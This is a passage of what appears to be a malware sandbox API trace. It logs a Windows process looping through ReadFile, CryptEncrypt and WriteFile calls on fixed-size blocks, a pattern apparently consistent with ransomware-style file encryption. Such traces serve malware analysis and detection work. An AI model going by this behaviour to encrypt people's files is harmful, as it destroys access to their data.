lpOverlapped=0x0) returned 1 [0271.046] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.046] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.046] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.046] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.046] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.046] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.047] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.047] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.047] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.047] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.047] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.047] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.047] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.047] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.047] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.048] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.048] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.048] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.048] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.048] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.048] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.049] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.049] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.049] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.049] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.049] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.049] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.049] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.049] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.049] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.050] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.050] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.050] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.050] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.050] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.051] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.051] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.051] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.054] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.054] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.054] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.054] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.054] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.054] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.055] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.055] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.055] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.055] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.055] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.056] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.056] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.056] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.056] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.056] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.056] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.057] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.057] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.057] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.057] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.057] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0271.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0271.058] CryptEncrypt (in: hKey=0x2fa608, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, 